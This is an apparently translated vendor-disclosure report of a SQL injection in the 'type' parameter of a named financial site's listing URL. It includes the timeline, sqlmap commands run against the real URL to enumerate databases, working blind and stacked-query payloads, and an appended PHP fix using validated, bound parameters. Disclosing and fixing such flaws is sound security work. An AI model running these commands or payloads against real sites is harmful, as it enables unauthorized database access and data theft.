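2015-06-24: Details reported to the vendor; awaiting vendor handling
2015-06-24: Vendor confirmed; details disclosed to the vendor only
2015-07-04: Details disclosed to core white hats and experts in the relevant field
2015-07-14: Details disclosed to regular white hats
2015-07-24: Details disclosed to intern white hats
2015-08-08: Details disclosed to the public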
0.0
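Injection point: https://www.koudailc.com/list/list?type=1&status=0&period=2&apr=0
The GET parameter type is not effectively filtered, which leads to an injection. This report only gives notice that the injection point exists; no further testing was done. Fix it quickly, quickly, quickly!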
python sqlmap.py -u "https://www.koudailc.com/list/list?type=1&status=0&period=2&apr=0" -p "type" --batch --dbs

web application technology: Nginx, PHP 5.5.19
back-end DBMS: MySQL 5.0.11
available databases [5]:
[masked region]

python sqlmap.py -u "https://www.koudailc.com/list/list?type=1&status=0&period=2&apr=0" -p "type" --batch --count -D koudai

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: type (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=1) AND 4706=4706 AND (2180=2180&status=0&period=2&apr=0

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: type=1);(SELECT * FROM (SELECT(SLEEP(5)))tenz)#&status=0&period=2&apr=0
---
Database: koudai
[masked region]
1. Filter input effectively
2. Come on, WooYun crowd testing is waiting for you!
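What "effective filtering" can look like for the four numeric GET parameters of the reported URL, as an added example that is not the vendor's code or part of the original report: each value is validated as a small integer and then bound as a query parameter. The table name `product`, its columns and the allowed ranges are assumptions, and SQLite stands in for the MySQL back end so the example runs offline.

```php
<?php
// Added example. Ranges, table and column names are assumptions; the report
// shows only the parameter names and the sample values 1, 0, 2, 0.
const FILTER_RANGES = ['type' => [0, 9], 'status' => [0, 9], 'period' => [0, 99], 'apr' => [0, 99]];

// Accept each filter only as a short string of ASCII digits within its range.
function parseFilters(array $query): array
{
    $clean = [];
    foreach (FILTER_RANGES as $name => [$min, $max]) {
        $raw = $query[$name] ?? '';
        if (!is_string($raw) || !preg_match('/\A[0-9]{1,3}\z/', $raw)
            || (int) $raw < $min || (int) $raw > $max) {
            throw new InvalidArgumentException("invalid value for $name");
        }
        $clean[$name] = (int) $raw;
    }
    return $clean;
}

// Values are bound as integers; none of them is concatenated into the SQL text.
function listProducts(PDO $db, array $filters): array
{
    $stmt = $db->prepare('SELECT id, name FROM product WHERE type = :type'
        . ' AND status = :status AND period = :period AND apr = :apr');
    foreach ($filters as $name => $value) {
        $stmt->bindValue(":$name", $value, PDO::PARAM_INT);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data in SQLite (stand-in for the MySQL back end).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE product (id INTEGER, name TEXT, type INTEGER, status INTEGER, period INTEGER, apr INTEGER)');
$db->exec("INSERT INTO product VALUES (1, 'demo', 1, 0, 2, 0)");

$requests = [
    ['type' => '1', 'status' => '0', 'period' => '2', 'apr' => '0'],                              // normal request
    ['type' => '1) AND 4706=4706 AND (2180=2180', 'status' => '0', 'period' => '2', 'apr' => '0'], // payload from the report
];
foreach ($requests as $query) {
    try {
        echo count(listProducts($db, parseFilters($query))), " row(s)\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

With PDO's MySQL driver, setting `PDO::MYSQL_ATTR_MULTI_STATEMENTS` to `false` on the connection additionally disables the stacked-query form that sqlmap reported.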
Severity: High
Vulnerability Rank: 15
Confirmation time: 2015-06-24 10:04
Thanks for the heads-up
None yet